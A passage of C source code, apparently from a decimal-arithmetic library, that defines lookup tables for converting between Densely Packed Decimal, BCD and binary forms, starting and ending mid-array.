0, 0, 0, 794, 795, 826, 827, 858, 859, 890, 891, 862, 863, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 896, 897, 898, 899, 900, 901, 902, 903, 904, 905, 0, 0, 0, 0, 0, 0, 912, 913, 914, 915, 916, 917, 918, 919, 920, 921, 0, 0, 0, 0, 0, 0, 928, 929, 930, 931, 932, 933, 934, 935, 936, 937, 0, 0, 0, 0, 0, 0, 944, 945, 946, 947, 
948, 949, 950, 951, 952, 953, 0, 0, 0, 0, 0, 0, 960, 961, 962, 963, 964, 965, 966, 967, 968, 969, 0, 0, 0, 0, 0, 0, 976, 977, 978, 979, 980, 981, 982, 983, 984, 985, 0, 0, 0, 0, 0, 0, 992, 993, 994, 995, 996, 997, 998, 999, 1000, 1001, 0, 0, 0, 0, 0, 0, 1008, 1009, 1010, 1011, 1012, 1013, 1014, 1015, 1016, 1017, 0, 0, 0, 0, 0, 0, 906, 907, 938, 939, 970, 971, 1002, 1003, 974, 975, 0, 0, 0, 0, 0, 0, 922, 923, 954, 955, 986, 987, 1018, 1019, 990, 991, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 12, 13, 268, 269, 524, 525, 780, 781, 46, 47, 0, 0, 0, 0, 0, 0, 28, 29, 284, 285, 540, 541, 796, 797, 62, 63, 0, 0, 0, 0, 0, 0, 44, 45, 300, 301, 556, 557, 812, 813, 302, 303, 0, 0, 0, 0, 0, 0, 60, 61, 316, 317, 572, 573, 828, 829, 318, 319, 0, 0, 0, 0, 0, 0, 76, 77, 332, 333, 588, 589, 844, 845, 558, 559, 0, 0, 0, 0, 0, 0, 92, 93, 348, 349, 604, 605, 860, 861, 574, 575, 0, 0, 0, 0, 0, 0, 108, 109, 364, 365, 620, 621, 876, 877, 814, 815, 0, 0, 0, 0, 0, 0, 124, 125, 380, 381, 636, 637, 892, 893, 830, 831, 0, 0, 0, 0, 0, 0, 14, 15, 270, 271, 526, 527, 782, 783, 110, 111, 0, 0, 0, 0, 0, 0, 30, 31, 286, 287, 542, 543, 798, 799, 126, 127, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 140, 141, 396, 397, 652, 653, 908, 909, 174, 175, 0, 0, 0, 0, 0, 0, 156, 157, 412, 413, 668, 669, 924, 925, 190, 191, 0, 0, 0, 0, 0, 0, 172, 173, 428, 429, 684, 685, 940, 941, 430, 431, 0, 0, 0, 0, 0, 0, 188, 189, 444, 445, 700, 701, 956, 957, 446, 447, 0, 0, 0, 0, 0, 0, 204, 205, 460, 461, 716, 717, 972, 973, 686, 687, 0, 0, 0, 0, 0, 0, 220, 221, 476, 477, 732, 733, 988, 989, 702, 703, 0, 0, 0, 0, 0, 0, 236, 237, 492, 493, 748, 749, 1004, 1005, 942, 943, 0, 0, 0, 0, 0, 0, 252, 253, 508, 509, 764, 765, 1020, 1021, 958, 959, 0, 0, 0, 0, 0, 0, 142, 143, 398, 399, 654, 655, 910, 911, 238, 239, 0, 0, 0, 0, 0, 0, 158, 159, 414, 415, 670, 671, 926, 927, 254, 255}; #endif #if defined(DEC_DPD2BCD) && DEC_DPD2BCD==1 && !defined(DECDPD2BCD) #define DECDPD2BCD const uint16_t DPD2BCD[1024]={ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 128, 129, 2048, 2049, 2176, 2177, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 144, 145, 2064, 2065, 2192, 2193, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 130, 131, 2080, 2081, 2056, 2057, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 146, 147, 2096, 2097, 2072, 2073, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 132, 133, 2112, 2113, 136, 137, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 148, 149, 2128, 2129, 152, 153, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 134, 135, 2144, 2145, 2184, 2185, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 150, 151, 2160, 2161, 2200, 2201, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 384, 385, 2304, 2305, 2432, 2433, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 400, 401, 2320, 2321, 2448, 2449, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 386, 387, 2336, 2337, 2312, 2313, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 402, 403, 2352, 2353, 2328, 2329, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 388, 389, 2368, 2369, 392, 393, 336, 337, 338, 339, 340, 341, 342, 343, 
344, 345, 404, 405, 2384, 2385, 408, 409, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 390, 391, 2400, 2401, 2440, 2441, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 406, 407, 2416, 2417, 2456, 2457, 512, 513, 514, 515, 516, 517, 518, 519, 520, 521, 640, 641, 2050, 2051, 2178, 2179, 528, 529, 530, 531, 532, 533, 534, 535, 536, 537, 656, 657, 2066, 2067, 2194, 2195, 544, 545, 546, 547, 548, 549, 550, 551, 552, 553, 642, 643, 2082, 2083, 2088, 2089, 560, 561, 562, 563, 564, 565, 566, 567, 568, 569, 658, 659, 2098, 2099, 2104, 2105, 576, 577, 578, 579, 580, 581, 582, 583, 584, 585, 644, 645, 2114, 2115, 648, 649, 592, 593, 594, 595, 596, 597, 598, 599, 600, 601, 660, 661, 2130, 2131, 664, 665, 608, 609, 610, 611, 612, 613, 614, 615, 616, 617, 646, 647, 2146, 2147, 2184, 2185, 624, 625, 626, 627, 628, 629, 630, 631, 632, 633, 662, 663, 2162, 2163, 2200, 2201, 768, 769, 770, 771, 772, 773, 774, 775, 776, 777, 896, 897, 2306, 2307, 2434, 2435, 784, 785, 786, 787, 788, 789, 790, 791, 792, 793, 912, 913, 2322, 2323, 2450, 2451, 800, 801, 802, 803, 804, 805, 806, 807, 808, 809, 898, 899, 2338, 2339, 2344, 2345, 816, 817, 818, 819, 820, 821, 822, 823, 824, 825, 914, 915, 2354, 2355, 2360, 2361, 832, 833, 834, 835, 836, 837, 838, 839, 840, 841, 900, 901, 2370, 2371, 904, 905, 848, 849, 850, 851, 852, 853, 854, 855, 856, 857, 916, 917, 2386, 2387, 920, 921, 864, 865, 866, 867, 868, 869, 870, 871, 872, 873, 902, 903, 2402, 2403, 2440, 2441, 880, 881, 882, 883, 884, 885, 886, 887, 888, 889, 918, 919, 2418, 2419, 2456, 2457, 1024, 1025, 1026, 1027, 1028, 1029, 1030, 1031, 1032, 1033, 1152, 1153, 2052, 2053, 2180, 2181, 1040, 1041, 1042, 1043, 1044, 1045, 1046, 1047, 1048, 1049, 1168, 1169, 2068, 2069, 2196, 2197, 1056, 1057, 1058, 1059, 1060, 1061, 1062, 1063, 1064, 1065, 1154, 1155, 2084, 2085, 2120, 2121, 1072, 1073, 1074, 1075, 1076, 1077, 1078, 1079, 1080, 1081, 1170, 1171, 2100, 2101, 2136, 2137, 1088, 1089, 1090, 1091, 1092, 1093, 1094, 1095, 1096, 1097, 1156, 1157, 2116, 2117, 1160, 1161, 1104, 1105, 1106, 1107, 1108, 1109, 1110, 1111, 1112, 1113, 1172, 1173, 2132, 2133, 1176, 1177, 1120, 1121, 1122, 1123, 1124, 1125, 1126, 1127, 1128, 1129, 1158, 1159, 2148, 2149, 2184, 2185, 1136, 1137, 1138, 1139, 1140, 1141, 1142, 1143, 1144, 1145, 1174, 1175, 2164, 2165, 2200, 2201, 1280, 1281, 1282, 1283, 1284, 1285, 1286, 1287, 1288, 1289, 1408, 1409, 2308, 2309, 2436, 2437, 1296, 1297, 1298, 1299, 1300, 1301, 1302, 1303, 1304, 1305, 1424, 1425, 2324, 2325, 2452, 2453, 1312, 1313, 1314, 1315, 1316, 1317, 1318, 1319, 1320, 1321, 1410, 1411, 2340, 2341, 2376, 2377, 1328, 1329, 1330, 1331, 1332, 1333, 1334, 1335, 1336, 1337, 1426, 1427, 2356, 2357, 2392, 2393, 1344, 1345, 1346, 1347, 1348, 1349, 1350, 1351, 1352, 1353, 1412, 1413, 2372, 2373, 1416, 1417, 1360, 1361, 1362, 1363, 1364, 1365, 1366, 1367, 1368, 1369, 1428, 1429, 2388, 2389, 1432, 1433, 1376, 1377, 1378, 1379, 1380, 1381, 1382, 1383, 1384, 1385, 1414, 1415, 2404, 2405, 2440, 2441, 1392, 1393, 1394, 1395, 1396, 1397, 1398, 1399, 1400, 1401, 1430, 1431, 2420, 2421, 2456, 2457, 1536, 1537, 1538, 1539, 1540, 1541, 1542, 1543, 1544, 1545, 1664, 1665, 2054, 2055, 2182, 2183, 1552, 1553, 1554, 1555, 1556, 1557, 1558, 1559, 1560, 1561, 1680, 1681, 2070, 2071, 2198, 2199, 1568, 1569, 1570, 1571, 1572, 1573, 1574, 1575, 1576, 1577, 1666, 1667, 2086, 2087, 2152, 2153, 1584, 1585, 1586, 1587, 1588, 1589, 1590, 1591, 1592, 1593, 1682, 1683, 2102, 2103, 2168, 2169, 1600, 1601, 1602, 1603, 1604, 1605, 1606, 1607, 1608, 1609, 1668, 1669, 2118, 2119, 
1672, 1673, 1616, 1617, 1618, 1619, 1620, 1621, 1622, 1623, 1624, 1625, 1684, 1685, 2134, 2135, 1688, 1689, 1632, 1633, 1634, 1635, 1636, 1637, 1638, 1639, 1640, 1641, 1670, 1671, 2150, 2151, 2184, 2185, 1648, 1649, 1650, 1651, 1652, 1653, 1654, 1655, 1656, 1657, 1686, 1687, 2166, 2167, 2200, 2201, 1792, 1793, 1794, 1795, 1796, 1797, 1798, 1799, 1800, 1801, 1920, 1921, 2310, 2311, 2438, 2439, 1808, 1809, 1810, 1811, 1812, 1813, 1814, 1815, 1816, 1817, 1936, 1937, 2326, 2327, 2454, 2455, 1824, 1825, 1826, 1827, 1828, 1829, 1830, 1831, 1832, 1833, 1922, 1923, 2342, 2343, 2408, 2409, 1840, 1841, 1842, 1843, 1844, 1845, 1846, 1847, 1848, 1849, 1938, 1939, 2358, 2359, 2424, 2425, 1856, 1857, 1858, 1859, 1860, 1861, 1862, 1863, 1864, 1865, 1924, 1925, 2374, 2375, 1928, 1929, 1872, 1873, 1874, 1875, 1876, 1877, 1878, 1879, 1880, 1881, 1940, 1941, 2390, 2391, 1944, 1945, 1888, 1889, 1890, 1891, 1892, 1893, 1894, 1895, 1896, 1897, 1926, 1927, 2406, 2407, 2440, 2441, 1904, 1905, 1906, 1907, 1908, 1909, 1910, 1911, 1912, 1913, 1942, 1943, 2422, 2423, 2456, 2457}; #endif #if defined(DEC_BIN2DPD) && DEC_BIN2DPD==1 && !defined(DECBIN2DPD) #define DECBIN2DPD const uint16_t BIN2DPD[1000]={ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 10, 11, 42, 43, 74, 75, 106, 107, 78, 79, 26, 27, 58, 59, 90, 91, 122, 123, 94, 95, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 138, 139, 170, 171, 202, 203, 234, 235, 206, 207, 154, 155, 186, 187, 218, 219, 250, 251, 222, 223, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 266, 267, 298, 299, 330, 331, 362, 363, 334, 335, 282, 283, 314, 315, 346, 347, 378, 379, 350, 351, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 464, 465, 466, 467, 468, 469, 470, 471, 472, 473, 480, 481, 482, 483, 484, 485, 486, 487, 488, 489, 496, 497, 498, 499, 500, 501, 502, 503, 504, 505, 394, 395, 426, 427, 458, 459, 490, 491, 462, 463, 410, 411, 442, 443, 474, 475, 506, 507, 478, 479, 512, 513, 514, 515, 516, 517, 518, 519, 520, 521, 528, 529, 530, 531, 532, 533, 534, 535, 536, 537, 544, 545, 546, 547, 548, 549, 550, 551, 552, 553, 560, 561, 562, 563, 564, 565, 566, 567, 568, 569, 576, 577, 578, 579, 580, 581, 582, 583, 584, 585, 592, 593, 594, 595, 596, 597, 598, 599, 600, 601, 608, 609, 610, 611, 612, 613, 614, 615, 616, 617, 624, 625, 626, 627, 628, 629, 630, 631, 632, 633, 522, 523, 554, 555, 586, 587, 618, 619, 590, 591, 
538, 539, 570, 571, 602, 603, 634, 635, 606, 607, 640, 641, 642, 643, 644, 645, 646, 647, 648, 649, 656, 657, 658, 659, 660, 661, 662, 663, 664, 665, 672, 673, 674, 675, 676, 677, 678, 679, 680, 681, 688, 689, 690, 691, 692, 693, 694, 695, 696, 697, 704, 705, 706, 707, 708, 709, 710, 711, 712, 713, 720, 721, 722, 723, 724, 725, 726, 727, 728, 729, 736, 737, 738, 739, 740, 741, 742, 743, 744, 745, 752, 753, 754, 755, 756, 757, 758, 759, 760, 761, 650, 651, 682, 683, 714, 715, 746, 747, 718, 719, 666, 667, 698, 699, 730, 731, 762, 763, 734, 735, 768, 769, 770, 771, 772, 773, 774, 775, 776, 777, 784, 785, 786, 787, 788, 789, 790, 791, 792, 793, 800, 801, 802, 803, 804, 805, 806, 807, 808, 809, 816, 817, 818, 819, 820, 821, 822, 823, 824, 825, 832, 833, 834, 835, 836, 837, 838, 839, 840, 841, 848, 849, 850, 851, 852, 853, 854, 855, 856, 857, 864, 865, 866, 867, 868, 869, 870, 871, 872, 873, 880, 881, 882, 883, 884, 885, 886, 887, 888, 889, 778, 779, 810, 811, 842, 843, 874, 875, 846, 847, 794, 795, 826, 827, 858, 859, 890, 891, 862, 863, 896, 897, 898, 899, 900, 901, 902, 903, 904, 905, 912, 913, 914, 915, 916, 917, 918, 919, 920, 921, 928, 929, 930, 931, 932, 933, 934, 935, 936, 937, 944, 945, 946, 947, 948, 949, 950, 951, 952, 953, 960, 961, 962, 963, 964, 965, 966, 967, 968, 969, 976, 977, 978, 979, 980, 981, 982, 983, 984, 985, 992, 993, 994, 995, 996, 997, 998, 999, 1000, 1001, 1008, 1009, 1010, 1011, 1012, 1013, 1014, 1015, 1016, 1017, 906, 907, 938, 939, 970, 971, 1002, 1003, 974, 975, 922, 923, 954, 955, 986, 987, 1018, 1019, 990, 991, 12, 13, 268, 269, 524, 525, 780, 781, 46, 47, 28, 29, 284, 285, 540, 541, 796, 797, 62, 63, 44, 45, 300, 301, 556, 557, 812, 813, 302, 303, 60, 61, 316, 317, 572, 573, 828, 829, 318, 319, 76, 77, 332, 333, 588, 589, 844, 845, 558, 559, 92, 93, 348, 349, 604, 605, 860, 861, 574, 575, 108, 109, 364, 365, 620, 621, 876, 877, 814, 815, 124, 125, 380, 381, 636, 637, 892, 893, 830, 831, 14, 15, 270, 271, 526, 527, 782, 783, 110, 111, 30, 31, 286, 287, 542, 543, 798, 799, 126, 127, 140, 141, 396, 397, 652, 653, 908, 909, 174, 175, 156, 157, 412, 413, 668, 669, 924, 925, 190, 191, 172, 173, 428, 429, 684, 685, 940, 941, 430, 431, 188, 189, 444, 445, 700, 701, 956, 957, 446, 447, 204, 205, 460, 461, 716, 717, 972, 973, 686, 687, 220, 221, 476, 477, 732, 733, 988, 989, 702, 703, 236, 237, 492, 493, 748, 749, 1004, 1005, 942, 943, 252, 253, 508, 509, 764, 765, 1020, 1021, 958, 959, 142, 143, 398, 399, 654, 655, 910, 911, 238, 239, 158, 159, 414, 415, 670, 671, 926, 927, 254, 255}; #endif #if defined(DEC_DPD2BIN) && DEC_DPD2BIN==1 && !defined(DECDPD2BIN) #define DECDPD2BIN const uint16_t DPD2BIN[1024]={ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 80, 81, 800, 801, 880, 881, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 90, 91, 810, 811, 890, 891, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 82, 83, 820, 821, 808, 809, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 92, 93, 830, 831, 818, 819, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 84, 85, 840, 841, 88, 89, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 94, 95, 850, 851, 98, 99, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 86, 87, 860, 861, 888, 889, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 96, 97, 870, 871, 898, 899, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 180, 181, 900, 901, 980, 981, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 190, 191, 910, 911, 990, 991, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 182, 183, 920, 921, 908, 909, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 192, 193, 930, 931, 918, 919, 140, 141, 142, 143, 144, 145, 
146, 147, 148, 149, 184, 185, 940, 941, 188, 189, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 194, 195, 950, 951, 198, 199, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 186, 187, 960, 961, 988, 989, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 196, 197, 970, 971, 998, 999, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 280, 281, 802, 803, 882, 883, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 290, 291, 812, 813, 892, 893, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 282, 283, 822, 823, 828, 829, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 292, 293, 832, 833, 838, 839, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 284, 285, 842, 843, 288, 289, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 294, 295, 852, 853, 298, 299, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 286, 287, 862, 863, 888, 889, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 296, 297, 872, 873, 898, 899, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 380, 381, 902, 903, 982, 983, 310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 390, 391, 912, 913, 992, 993, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 382, 383, 922, 923, 928, 929, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 392, 393, 932, 933, 938, 939, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 384, 385, 942, 943, 388, 389, 350, 351, 352, 353, 354, 355, 356, 357, 358, 359, 394, 395, 952, 953, 398, 399, 360, 361, 362, 363, 364, 365, 366, 367, 368, 369, 386, 387, 962, 963, 988, 989, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 396, 397, 972, 973, 998, 999, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 480, 481, 804, 805, 884, 885, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 490, 491, 814, 815, 894, 895, 420, 421, 422, 423, 424, 425, 426, 427, 428, 429, 482, 483, 824, 825, 848, 849, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, 492, 493, 834, 835, 858, 859, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 484, 485, 844, 845, 488, 489, 450, 451, 452, 453, 454, 455, 456, 457, 458, 459, 494, 495, 854, 855, 498, 499, 460, 461, 462, 463, 464, 465, 466, 467, 468, 469, 486, 487, 864, 865, 888, 889, 470, 471, 472, 473, 474, 475, 476, 477, 478, 479, 496, 497, 874, 875, 898, 899, 500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 580, 581, 904, 905, 984, 985, 510, 511, 512, 513, 514, 515, 516, 517, 518, 519, 590, 591, 914, 915, 994, 995, 520, 521, 522, 523, 524, 525, 526, 527, 528, 529, 582, 583, 924, 925, 948, 949, 530, 531, 532, 533, 534, 535, 536, 537, 538, 539, 592, 593, 934, 935, 958, 959, 540, 541, 542, 543, 544, 545, 546, 547, 548, 549, 584, 585, 944, 945, 588, 589, 550, 551, 552, 553, 554, 555, 556, 557, 558, 559, 594, 595, 954, 955, 598, 599, 560, 561, 562, 563, 564, 565, 566, 567, 568, 569, 586, 587, 964, 965, 988, 989, 570, 571, 572, 573, 574, 575, 576, 577, 578, 579, 596, 597, 974, 975, 998, 999, 600, 601, 602, 603, 604, 605, 606, 607, 608, 609, 680, 681, 806, 807, 886, 887, 610, 611, 612, 613, 614, 615, 616, 617, 618, 619, 690, 691, 816, 817, 896, 897, 620, 621, 622, 623, 624, 625, 626, 627, 628, 629, 682, 683, 826, 827, 868, 869, 630, 631, 632, 633, 634, 635, 636, 637, 638, 639, 692, 693, 836, 837, 878, 879, 640, 641, 642, 643, 644, 645, 646, 647, 648, 649, 684, 685, 846, 847, 688, 689, 650, 651, 652, 653, 654, 655, 656, 657, 658, 659, 694, 695, 856, 857, 698, 699, 660, 661, 662, 663, 664, 665, 666, 667, 668, 669, 686, 687, 866, 867, 888, 889, 670, 671, 672, 673, 674, 675, 676, 677, 678, 679, 696, 697, 876, 877, 898, 899, 700, 701, 702, 703, 704, 705, 706, 707, 708, 709, 780, 781, 906, 
907, 986, 987, 710, 711, 712, 713, 714, 715, 716, 717, 718, 719, 790, 791, 916, 917, 996, 997, 720, 721, 722, 723, 724, 725, 726, 727, 728, 729, 782, 783, 926, 927, 968, 969, 730, 731, 732, 733, 734, 735, 736, 737, 738, 739, 792, 793, 936, 937, 978, 979, 740, 741, 742, 743, 744, 745, 746, 747, 748, 749, 784, 785, 946, 947, 788, 789, 750, 751, 752, 753, 754, 755, 756, 757, 758, 759, 794, 795, 956, 957, 798, 799, 760, 761, 762, 763, 764, 765, 766, 767, 768, 769, 786, 787, 966, 967, 988, 989, 770, 771, 772, 773, 774, 775, 776, 777, 778, 779, 796, 797, 976, 977, 998, 999}; #endif #if defined(DEC_DPD2BINK) && DEC_DPD2BINK==1 && !defined(DECDPD2BINK) #define DECDPD2BINK const uint32_t DPD2BINK[1024]={ 0, 1000, 2000, 3000, 4000, 5000, 6000, 7000, 8000, 9000, 80000, 81000, 800000, 801000, 880000, 881000, 10000, 11000, 12000, 13000, 14000, 15000, 16000, 17000, 18000, 19000, 90000, 91000, 810000, 811000, 890000, 891000, 20000, 21000, 22000, 23000, 24000, 25000, 26000, 27000, 28000, 29000, 82000, 83000, 820000, 821000, 808000, 809000, 30000, 31000, 32000, 33000, 34000, 35000, 36000, 37000, 38000, 39000, 92000, 93000, 830000, 831000, 818000, 819000, 40000, 41000, 42000, 43000, 44000, 45000, 46000, 47000, 48000, 49000, 84000, 85000, 840000, 841000, 88000, 89000, 50000, 51000, 52000, 53000, 54000, 55000, 56000, 57000, 58000, 59000, 94000, 95000, 850000, 851000, 98000, 99000, 60000, 61000, 62000, 63000, 64000, 65000, 66000, 67000, 68000, 69000, 86000, 87000, 860000, 861000, 888000, 889000, 70000, 71000, 72000, 73000, 74000, 75000, 76000, 77000, 78000, 79000, 96000, 97000, 870000, 871000, 898000, 899000, 100000, 101000, 102000, 103000, 104000, 105000, 106000, 107000, 108000, 109000, 180000, 181000, 900000, 901000, 980000, 981000, 110000, 111000, 112000, 113000, 114000, 115000, 116000, 117000, 118000, 119000, 190000, 191000, 910000, 911000, 990000, 991000, 120000, 121000, 122000, 123000, 124000, 125000, 126000, 127000, 128000, 129000, 182000, 183000, 920000, 921000, 908000, 909000, 130000, 131000, 132000, 133000, 134000, 135000, 136000, 137000, 138000, 139000, 192000, 193000, 930000, 931000, 918000, 919000, 140000, 141000, 142000, 143000, 144000, 145000, 146000, 147000, 148000, 149000, 184000, 185000, 940000, 941000, 188000, 189000, 150000, 151000, 152000, 153000, 154000, 155000, 156000, 157000, 158000, 159000, 194000, 195000, 950000, 951000, 198000, 199000, 160000, 161000, 162000, 163000, 164000, 165000, 166000, 167000, 168000, 169000, 186000, 187000, 960000, 961000, 988000, 989000, 170000, 171000, 172000, 173000, 174000, 175000, 176000, 177000, 178000, 179000, 196000, 197000, 970000, 971000, 998000, 999000, 200000, 201000, 202000, 203000, 204000, 205000, 206000, 207000, 208000, 209000, 280000, 281000, 802000, 803000, 882000, 883000, 210000, 211000, 212000, 213000, 214000, 215000, 216000, 217000, 218000, 219000, 290000, 291000, 812000, 813000, 892000, 893000, 220000, 221000, 222000, 223000, 224000, 225000, 226000, 227000, 228000, 229000, 282000, 283000, 822000, 823000, 828000, 829000, 230000, 231000, 232000, 233000, 234000, 235000, 236000, 237000, 238000, 239000, 292000, 293000, 832000, 833000, 838000, 839000, 240000, 241000, 242000, 243000, 244000, 245000, 246000, 247000, 248000, 249000, 284000, 285000, 842000, 843000, 288000, 289000, 250000, 251000, 252000, 253000, 254000, 255000, 256000, 257000, 258000, 259000, 294000, 295000, 852000, 853000, 298000, 299000, 260000, 261000, 262000, 263000, 264000, 265000, 266000, 267000, 268000, 269000, 286000, 287000, 862000, 863000, 888000, 889000, 270000, 271000, 
272000, 273000, 274000, 275000, 276000, 277000, 278000, 279000, 296000, 297000, 872000, 873000, 898000, 899000, 300000, 301000, 302000, 303000, 304000, 305000, 306000, 307000, 308000, 309000, 380000, 381000, 902000, 903000, 982000, 983000, 310000, 311000, 312000, 313000, 314000, 315000, 316000, 317000, 318000, 319000, 390000, 391000, 912000, 913000, 992000, 993000, 320000, 321000, 322000, 323000, 324000, 325000, 326000, 327000, 328000, 329000, 382000, 383000, 922000, 923000, 928000, 929000, 330000, 331000, 332000, 333000, 334000, 335000, 336000, 337000, 338000, 339000, 392000, 393000, 932000, 933000, 938000, 939000, 340000, 341000, 342000, 343000, 344000, 345000, 346000, 347000, 348000, 349000, 384000, 385000, 942000, 943000, 388000, 389000, 350000, 351000, 352000, 353000, 354000, 355000, 356000, 357000, 358000, 359000, 394000, 395000, 952000, 953000, 398000, 399000, 360000, 361000, 362000, 363000, 364000, 365000, 366000, 367000, 368000, 369000, 386000, 387000, 962000, 963000, 988000, 989000, 370000, 371000, 372000, 373000, 374000, 375000, 376000, 377000, 378000, 379000, 396000, 397000, 972000, 973000, 998000, 999000, 400000, 401000, 402000, 403000, 404000, 405000, 406000, 407000, 408000, 409000, 480000, 481000, 804000, 805000, 884000, 885000, 410000, 411000, 412000, 413000, 414000, 415000, 416000, 417000, 418000, 419000, 490000, 491000, 814000, 815000, 894000, 895000, 420000, 421000, 422000, 423000, 424000, 425000, 426000, 427000, 428000, 429000, 482000, 483000, 824000, 825000, 848000, 849000, 430000, 431000, 432000, 433000, 434000, 435000, 436000, 437000, 438000, 439000, 492000, 493000, 834000, 835000, 858000, 859000, 440000, 441000, 442000, 443000, 444000, 445000, 446000, 447000, 448000, 449000, 484000, 485000, 844000, 845000, 488000, 489000, 450000, 451000, 452000, 453000, 454000, 455000, 456000, 457000, 458000, 459000, 494000, 495000, 854000, 855000, 498000, 499000, 460000, 461000, 462000, 463000, 464000, 465000, 466000, 467000, 468000, 469000, 486000, 487000, 864000, 865000, 888000, 889000, 470000, 471000, 472000, 473000, 474000, 